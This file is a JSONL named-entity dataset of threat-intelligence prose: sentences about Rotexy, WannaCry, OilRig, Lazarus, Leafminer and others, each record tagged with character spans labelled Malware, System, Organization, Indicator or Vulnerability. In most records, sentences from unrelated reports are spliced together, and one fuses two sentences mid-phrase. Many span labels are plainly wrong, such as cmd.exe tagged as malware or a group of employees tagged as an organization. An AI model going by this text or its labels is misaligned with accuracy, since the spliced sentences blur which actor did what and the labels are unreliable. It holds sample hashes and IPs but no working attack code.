{"text": "Also , in some versions of the Trojan the file names were random strings of characters . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 .", "spans": [{"start": 117, "end": 130, "label": "System"}, {"start": 214, "end": 237, "label": "Malware"}, {"start": 268, "end": 291, "label": "Malware"}, {"start": 316, "end": 338, "label": "System"}, {"start": 400, "end": 402, "label": "Indicator"}, {"start": 413, "end": 421, "label": "Malware"}, {"start": 491, "end": 493, "label": "Indicator"}]}
{"text": "In 2018 , versions of Rotexy emerged that contacted the C & C using its IP address . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 159, "end": 184, "label": "Malware"}, {"start": 227, "end": 235, "label": "Malware"}, {"start": 252, "end": 256, "label": "Malware"}, {"start": 260, "end": 271, "label": "Malware"}, {"start": 318, "end": 328, "label": "Malware"}, {"start": 430, "end": 439, "label": "Organization"}, {"start": 443, "end": 463, "label": "System"}, {"start": 466, "end": 469, "label": "System"}]}
{"text": "\u2018 One-time \u2019 domains also appeared with names made up of random strings of characters and numbers , combined with the top-level domains .cf , .ga , .gq , .ml , or .tk . The HTA files contained job descriptions and links to job postings on popular employment websites . The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities .", "spans": [{"start": 173, "end": 182, "label": "Malware"}, {"start": 183, "end": 219, "label": "Malware"}, {"start": 273, "end": 281, "label": "Malware"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 449, "end": 452, "label": "Malware"}]}
{"text": "At this time , the Trojan also began actively using different methods of obfuscation . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": [{"start": 157, "end": 173, "label": "System"}, {"start": 176, "end": 179, "label": "Malware"}, {"start": 190, "end": 198, "label": "Malware"}, {"start": 212, "end": 219, "label": "Vulnerability"}, {"start": 234, "end": 245, "label": "Vulnerability"}, {"start": 275, "end": 289, "label": "Organization"}]}
{"text": "For example , the DEX file is packed with garbage strings and/or operations , and contains a key to decipher the main executable file from the APK . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": [{"start": 149, "end": 157, "label": "System"}, {"start": 190, "end": 198, "label": "Malware"}, {"start": 214, "end": 227, "label": "Vulnerability"}, {"start": 230, "end": 238, "label": "Malware"}, {"start": 277, "end": 282, "label": "Indicator"}, {"start": 368, "end": 375, "label": "System"}]}
{"text": "Latest version ( 2018 ) Let \u2019 s now return to the present day and a detailed description of the functionality of a current representative of the Rotexy family ( SHA256 : ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 ) . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . In May 2017 , SecureWorks\u00ae Counter Threat Unit\u00ae ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world .", "spans": [{"start": 145, "end": 151, "label": "Malware"}, {"start": 170, "end": 234, "label": "Indicator"}, {"start": 239, "end": 248, "label": "Malware"}, {"start": 285, "end": 302, "label": "Organization"}, {"start": 344, "end": 373, "label": "Malware"}, {"start": 468, "end": 501, "label": "Organization"}, {"start": 504, "end": 507, "label": "Organization"}, {"start": 566, "end": 570, "label": "Malware"}, {"start": 587, "end": 594, "label": "Malware"}, {"start": 597, "end": 606, "label": "Malware"}, {"start": 613, "end": 627, "label": "Malware"}]}
{"text": "Application launch When launching for the first time , the Trojan checks if it is being launched in an emulation environment , and in which country it is being launched . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world .", "spans": [{"start": 171, "end": 182, "label": "Malware"}, {"start": 321, "end": 352, "label": "Organization"}, {"start": 355, "end": 358, "label": "Organization"}]}
{"text": "If the device is located outside Russia or is an emulator , the application displays a stub page : In this case , the Trojan \u2019 s logs contain records in Russian with grammatical errors and spelling mistakes : If the check is successful , Rotexy registers with GCM and launches SuperService which tracks if the Trojan has device administrator privileges . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": [{"start": 238, "end": 244, "label": "Malware"}, {"start": 260, "end": 263, "label": "System"}, {"start": 425, "end": 429, "label": "System"}, {"start": 653, "end": 668, "label": "Malware"}, {"start": 671, "end": 680, "label": "Organization"}, {"start": 695, "end": 700, "label": "System"}, {"start": 701, "end": 716, "label": "Vulnerability"}]}
{"text": "SuperService also tracks its own status and relaunches if stopped . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": [{"start": 92, "end": 101, "label": "Malware"}, {"start": 129, "end": 148, "label": "Malware"}, {"start": 239, "end": 244, "label": "System"}, {"start": 245, "end": 252, "label": "Vulnerability"}, {"start": 296, "end": 310, "label": "Organization"}]}
{"text": "It performs a privilege check once every second ; if unavailable , the Trojan starts requesting them from the user in an infinite loop : If the user agrees and gives the application the requested privileges , another stub page is displayed , and the app hides its icon : If the Trojan detects an attempt to revoke its administrator privileges , it starts periodically switching off the phone screen , trying to stop the user actions . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes . If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": [{"start": 439, "end": 465, "label": "Organization"}, {"start": 513, "end": 528, "label": "Malware"}, {"start": 594, "end": 604, "label": "Organization"}, {"start": 629, "end": 641, "label": "Organization"}, {"start": 651, "end": 672, "label": "Malware"}, {"start": 699, "end": 707, "label": "Malware"}, {"start": 752, "end": 763, "label": "Vulnerability"}, {"start": 764, "end": 769, "label": "System"}, {"start": 770, "end": 777, "label": "Vulnerability"}]}
{"text": "If the privileges are revoked successfully , the Trojan relaunches the cycle of requesting administrator privileges . We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . WCry uses a combination of the RSA and AES algorithms to encrypt files .", "spans": [{"start": 147, "end": 164, "label": "System"}, {"start": 184, "end": 202, "label": "Malware"}, {"start": 211, "end": 223, "label": "System"}, {"start": 228, "end": 246, "label": "Malware"}, {"start": 249, "end": 272, "label": "Malware"}, {"start": 275, "end": 295, "label": "Malware"}, {"start": 306, "end": 353, "label": "Malware"}, {"start": 356, "end": 367, "label": "Malware"}, {"start": 424, "end": 428, "label": "Malware"}, {"start": 455, "end": 458, "label": "Malware"}, {"start": 463, "end": 466, "label": "Malware"}]}
{"text": "If , for some reason , SuperService does not switch off the screen when there is an attempt to revoke the device administrator privileges , the Trojan tries to intimidate the user : While running , Rotexy tracks the following : switching on and rebooting of the phone ; termination of its operation \u2013 in this case , it relaunches ; sending of an SMS by the app \u2013 in this case , the phone is switched to silent mode . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence .", "spans": [{"start": 198, "end": 204, "label": "Malware"}, {"start": 433, "end": 484, "label": "Organization"}, {"start": 487, "end": 491, "label": "Organization"}, {"start": 527, "end": 545, "label": "Malware"}, {"start": 564, "end": 572, "label": "Organization"}, {"start": 576, "end": 593, "label": "Malware"}, {"start": 600, "end": 610, "label": "System"}, {"start": 647, "end": 652, "label": "Organization"}, {"start": 723, "end": 728, "label": "Organization"}, {"start": 836, "end": 844, "label": "Malware"}, {"start": 859, "end": 863, "label": "Malware"}]}
{"text": "C & C communications The default C & C address is hardwired in the Rotexy code : The relative address to which the Trojan will send information from the device is generated in a pseudo-random manner . Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group .", "spans": [{"start": 67, "end": 73, "label": "Malware"}, {"start": 261, "end": 284, "label": "Malware"}, {"start": 372, "end": 401, "label": "Malware"}, {"start": 414, "end": 423, "label": "Organization"}, {"start": 448, "end": 456, "label": "Organization"}, {"start": 475, "end": 493, "label": "Organization"}, {"start": 631, "end": 635, "label": "Organization"}, {"start": 656, "end": 669, "label": "Organization"}]}
{"text": "Depending on the Trojan version , dynamically generated subdomains can also be used . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group .", "spans": [{"start": 100, "end": 111, "label": "Organization"}, {"start": 145, "end": 164, "label": "Malware"}, {"start": 216, "end": 225, "label": "Organization"}, {"start": 250, "end": 258, "label": "Organization"}, {"start": 349, "end": 362, "label": "Organization"}]}
{"text": "The Trojan stores information about C & C servers and the data harvested from the infected device in a local SQLite database . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware .", "spans": [{"start": 141, "end": 152, "label": "Organization"}, {"start": 186, "end": 205, "label": "Malware"}, {"start": 265, "end": 278, "label": "Organization"}, {"start": 299, "end": 307, "label": "Malware"}]}
{"text": "First off , the Trojan registers in the administration panel and receives the information it needs to operate from the C & C ( the SMS interception templates and the text that will be displayed on HTML pages ) : Rotexy intercepts all incoming SMSs and processes them according to the templates it received from the C & C . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": [{"start": 212, "end": 218, "label": "Malware"}, {"start": 328, "end": 341, "label": "Malware"}, {"start": 391, "end": 404, "label": "Malware"}, {"start": 425, "end": 438, "label": "Vulnerability"}, {"start": 614, "end": 627, "label": "Organization"}, {"start": 648, "end": 656, "label": "Malware"}, {"start": 701, "end": 720, "label": "Organization"}]}
{"text": "Also , when an SMS arrives , the Trojan puts the phone into silent mode and switches off the screen so the user doesn \u2019 t notice that a new SMS has arrived . Taking a step back , as discussed in the Appendix in our initial OilRig blog , Clayslide delivery documents initially open with a worksheet named \" Incompatible \" that displays content that instructs the user to \" Enable Content \" to see the contents of the document , which in fact runs the malicious macro and compromises the system . Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus .", "spans": [{"start": 223, "end": 229, "label": "Organization"}, {"start": 237, "end": 265, "label": "Malware"}, {"start": 441, "end": 465, "label": "Malware"}, {"start": 470, "end": 492, "label": "Malware"}, {"start": 507, "end": 518, "label": "Organization"}, {"start": 693, "end": 705, "label": "Organization"}]}
{"text": "When required , the Trojan sends an SMS to the specified phone number with the information it has received from the intercepted message . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . In November 2017 , Secureworks Counter Threat Unit\u2122 ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": [{"start": 181, "end": 190, "label": "Malware"}, {"start": 206, "end": 219, "label": "Vulnerability"}, {"start": 241, "end": 273, "label": "Organization"}, {"start": 276, "end": 279, "label": "Organization"}, {"start": 352, "end": 365, "label": "Organization"}, {"start": 392, "end": 406, "label": "Organization"}, {"start": 410, "end": 421, "label": "Organization"}, {"start": 541, "end": 563, "label": "Organization"}]}
{"text": "( It is specified in the interception template whether a reply must be sent , and which text should be sent to which address . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas . In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": [{"start": 163, "end": 178, "label": "System"}, {"start": 181, "end": 193, "label": "Malware"}, {"start": 246, "end": 287, "label": "Malware"}, {"start": 309, "end": 312, "label": "Organization"}, {"start": 383, "end": 396, "label": "Organization"}, {"start": 516, "end": 538, "label": "Organization"}]}
{"text": ") If the application hasn \u2019 t received instructions about the rules for processing incoming SMSs , it simply saves all SMSs to a local database and uploads them to the C & C . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations .", "spans": [{"start": 219, "end": 249, "label": "Malware"}, {"start": 287, "end": 293, "label": "Organization"}, {"start": 350, "end": 358, "label": "Malware"}, {"start": 441, "end": 465, "label": "Organization"}, {"start": 534, "end": 557, "label": "Organization"}]}
{"text": "Apart from general information about the device , the Trojan sends a list of all the running processes and installed applications to the C & C . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing .", "spans": [{"start": 185, "end": 207, "label": "Malware"}, {"start": 231, "end": 245, "label": "System"}, {"start": 267, "end": 279, "label": "System"}, {"start": 282, "end": 285, "label": "Organization"}]}
{"text": "It \u2019 s possible the threat actors use this list to find running antivirus or banking applications . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot . CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns .", "spans": [{"start": 137, "end": 149, "label": "System"}, {"start": 209, "end": 224, "label": "Malware"}, {"start": 227, "end": 230, "label": "Organization"}, {"start": 257, "end": 271, "label": "Organization"}, {"start": 274, "end": 281, "label": "Organization"}]}
{"text": "Rotexy will perform further actions after it receives the corresponding commands : START , STOP , RESTART \u2014 start , stop , restart SuperService . We had previously observed this author name in use once before , in the very first ThreeDollars document we collected that we had reported on in August 2017 . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 229, "end": 250, "label": "Malware"}, {"start": 351, "end": 354, "label": "Organization"}, {"start": 404, "end": 418, "label": "Organization"}]}
{"text": "URL \u2014 update C & C address . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet . CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": [{"start": 53, "end": 62, "label": "System"}, {"start": 82, "end": 111, "label": "Malware"}, {"start": 125, "end": 152, "label": "System"}, {"start": 363, "end": 366, "label": "Organization"}, {"start": 413, "end": 431, "label": "Malware"}, {"start": 476, "end": 490, "label": "Organization"}, {"start": 493, "end": 500, "label": "Organization"}]}
{"text": "MESSAGE \u2013 send SMS containing specified text to a specified number . During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface \u2013 test.xls . CTU researchers also identified components in the custom C2 protocol being used ( the ACT in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": [{"start": 208, "end": 228, "label": "Malware"}, {"start": 233, "end": 260, "label": "Malware"}, {"start": 263, "end": 266, "label": "Organization"}, {"start": 313, "end": 331, "label": "Malware"}, {"start": 450, "end": 464, "label": "Organization"}, {"start": 467, "end": 474, "label": "Organization"}]}
{"text": "UPDATE_PATTERNS \u2013 reregister in the administration panel . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 . Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts .", "spans": [{"start": 106, "end": 112, "label": "Organization"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 298, "end": 308, "label": "Malware"}, {"start": 418, "end": 427, "label": "Organization"}]}
{"text": "UNBLOCK \u2013 unblock the telephone ( revoke device administrator privileges from the app ) . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group .", "spans": [{"start": 94, "end": 103, "label": "Organization"}, {"start": 150, "end": 159, "label": "Malware"}, {"start": 163, "end": 202, "label": "Organization"}, {"start": 314, "end": 317, "label": "Malware"}, {"start": 371, "end": 385, "label": "Organization"}, {"start": 388, "end": 395, "label": "Organization"}]}
{"text": "UPDATE \u2013 download APK file from C & C and install it . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and Exfiltration .", "spans": [{"start": 87, "end": 101, "label": "Organization"}, {"start": 141, "end": 162, "label": "Malware"}, {"start": 186, "end": 191, "label": "Organization"}, {"start": 302, "end": 311, "label": "Organization"}]}
{"text": "This command can be used not just to update the app but to install any other software on the infected device . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer .", "spans": [{"start": 227, "end": 244, "label": "Organization"}, {"start": 299, "end": 313, "label": "Malware"}, {"start": 419, "end": 435, "label": "Malware"}, {"start": 451, "end": 460, "label": "Organization"}]}
{"text": "CONTACTS \u2013 send text received from C & C to all user contacts . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers .", "spans": [{"start": 98, "end": 104, "label": "Organization"}, {"start": 157, "end": 174, "label": "System"}, {"start": 234, "end": 246, "label": "Malware"}, {"start": 250, "end": 269, "label": "Malware"}, {"start": 375, "end": 391, "label": "Malware"}, {"start": 407, "end": 416, "label": "Organization"}]}
{"text": "This is most probably how the application spreads . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems .", "spans": [{"start": 52, "end": 60, "label": "Organization"}, {"start": 83, "end": 99, "label": "Malware"}, {"start": 112, "end": 127, "label": "Malware"}, {"start": 130, "end": 147, "label": "Malware"}, {"start": 154, "end": 169, "label": "Malware"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 265, "end": 270, "label": "System"}]}
{"text": "CONTACTS_PRO \u2013 request unique message text for contacts from the address book . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army .", "spans": [{"start": 160, "end": 167, "label": "Malware"}, {"start": 170, "end": 207, "label": "Malware"}, {"start": 302, "end": 308, "label": "Organization"}, {"start": 378, "end": 386, "label": "Organization"}, {"start": 438, "end": 446, "label": "Organization"}]}
{"text": "PAGE \u2013 contact URL received from C & C using User-Agent value that was also received from C & C or local database . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan .", "spans": [{"start": 136, "end": 149, "label": "Organization"}, {"start": 194, "end": 219, "label": "Malware"}, {"start": 225, "end": 248, "label": "Organization"}, {"start": 300, "end": 309, "label": "Organization"}]}
{"text": "ALLMSG \u2013 send C & C all SMSs received and sent by user , as stored in phone memory . Symantec detects this threat as Backdoor.Nidiran . Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East .", "spans": [{"start": 85, "end": 93, "label": "Organization"}, {"start": 117, "end": 133, "label": "Malware"}, {"start": 157, "end": 166, "label": "Organization"}, {"start": 197, "end": 212, "label": "Malware"}, {"start": 224, "end": 244, "label": "Malware"}]}
{"text": "ALLCONTACTS \u2013 send all contacts from phone memory to C & C . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 .", "spans": [{"start": 101, "end": 116, "label": "Malware"}, {"start": 148, "end": 165, "label": "System"}, {"start": 179, "end": 197, "label": "System"}, {"start": 272, "end": 281, "label": "Malware"}, {"start": 355, "end": 369, "label": "Organization"}]}
{"text": "ONLINE \u2013 send information about Trojan \u2019 s current status to C & C : whether it has device administrator privileges , which HTML page is currently displayed , whether screen is on or off , etc . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": [{"start": 228, "end": 235, "label": "System"}, {"start": 259, "end": 285, "label": "System"}, {"start": 320, "end": 324, "label": "Malware"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 385, "end": 392, "label": "Vulnerability"}, {"start": 485, "end": 488, "label": "System"}, {"start": 489, "end": 504, "label": "Vulnerability"}, {"start": 518, "end": 527, "label": "Organization"}]}
{"text": "NEWMSG \u2013 write an SMS to the device memory containing the text and sender number sent from C & C . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": [{"start": 208, "end": 224, "label": "Malware"}, {"start": 331, "end": 342, "label": "Vulnerability"}, {"start": 343, "end": 351, "label": "Vulnerability"}, {"start": 465, "end": 470, "label": "Malware"}, {"start": 473, "end": 481, "label": "Malware"}]}
{"text": "CHANGE_GCM_ID \u2013 change GCM ID . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": [{"start": 141, "end": 157, "label": "Malware"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 274, "end": 283, "label": "Organization"}, {"start": 288, "end": 299, "label": "Vulnerability"}]}
{"text": "BLOCKER_BANKING_START \u2013 display phishing HTML page for entry of bank card details . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": [{"start": 164, "end": 189, "label": "Malware"}, {"start": 222, "end": 235, "label": "Vulnerability"}, {"start": 250, "end": 262, "label": "System"}, {"start": 294, "end": 320, "label": "System"}, {"start": 323, "end": 326, "label": "System"}, {"start": 331, "end": 339, "label": "Organization"}, {"start": 366, "end": 375, "label": "Organization"}, {"start": 392, "end": 416, "label": "Vulnerability"}, {"start": 419, "end": 432, "label": "Vulnerability"}, {"start": 463, "end": 465, "label": "Indicator"}]}
{"text": "BLOCKER_EXTORTIONIST_START \u2013 display HTML page of the ransomware . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability .", "spans": [{"start": 151, "end": 176, "label": "Malware"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 237, "end": 249, "label": "System"}, {"start": 281, "end": 307, "label": "System"}, {"start": 310, "end": 313, "label": "System"}, {"start": 336, "end": 345, "label": "Organization"}, {"start": 370, "end": 383, "label": "Malware"}]}
{"text": "BLOCKER_UPDATE_START \u2013 display fake HTML page for update . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system .", "spans": [{"start": 145, "end": 158, "label": "Malware"}, {"start": 178, "end": 217, "label": "Vulnerability"}, {"start": 220, "end": 233, "label": "Vulnerability"}, {"start": 271, "end": 280, "label": "Organization"}, {"start": 396, "end": 405, "label": "Malware"}]}
{"text": "BLOCKER_STOP \u2013 block display of all HTML pages . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts . Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia .", "spans": [{"start": 146, "end": 149, "label": "Organization"}, {"start": 171, "end": 178, "label": "Malware"}, {"start": 347, "end": 356, "label": "Malware"}, {"start": 360, "end": 369, "label": "Organization"}, {"start": 425, "end": 434, "label": "Organization"}]}
{"text": "The C & C role for Rotexy can be filled not only by a web server but also by any device that can send SMSs . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu .", "spans": [{"start": 19, "end": 25, "label": "Malware"}, {"start": 134, "end": 137, "label": "Organization"}, {"start": 174, "end": 179, "label": "Malware"}, {"start": 257, "end": 265, "label": "Organization"}, {"start": 319, "end": 334, "label": "Organization"}, {"start": 337, "end": 350, "label": "Malware"}, {"start": 355, "end": 369, "label": "Malware"}]}
{"text": "The Trojan intercepts incoming SMSs and can receive the following commands from them : \u201c 3458 \u201d \u2014 revoke device administrator privileges from the app ; \u201c hi \u201d , \u201c ask \u201d \u2014 enable and disable mobile internet ; \u201c privet \u201d , \u201c ru \u201d \u2014 enable and disable Wi-Fi ; \u201c check \u201d \u2014 send text \u201c install : [ device IMEI ] \u201d to phone number from which SMS was sent ; \u201c stop_blocker \u201d \u2014 stop displaying all blocking HTML pages ; \u201c 393838 \u201d \u2014 change C & C address to that specified in the Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network . Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East .", "spans": [{"start": 552, "end": 573, "label": "Malware"}, {"start": 620, "end": 629, "label": "Organization"}]}
{"text": "SMS . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors .", "spans": [{"start": 6, "end": 15, "label": "Malware"}, {"start": 47, "end": 64, "label": "Malware"}, {"start": 154, "end": 163, "label": "Organization"}, {"start": 296, "end": 302, "label": "Organization"}]}
{"text": "Information about all actions performed by Rotexy is logged in the local database and sent to the C & C . The malicious loader will use dynamic-link library ( DLL ) hijacking \u2014 injecting malicious code into a process of a file/application \u2014 on sidebar.exe and launch dllhost.exe ( a normal file ) . Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year .", "spans": [{"start": 43, "end": 49, "label": "Malware"}, {"start": 244, "end": 255, "label": "Malware"}, {"start": 267, "end": 278, "label": "Malware"}, {"start": 299, "end": 308, "label": "Organization"}]}
{"text": "The server then sends a reply that contains instructions on further actions to be taken . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . Dragos has identified Leafminer group targeting access operations in the electric utility sector .", "spans": [{"start": 156, "end": 167, "label": "Malware"}, {"start": 245, "end": 251, "label": "Organization"}, {"start": 267, "end": 282, "label": "Organization"}, {"start": 318, "end": 341, "label": "Organization"}]}
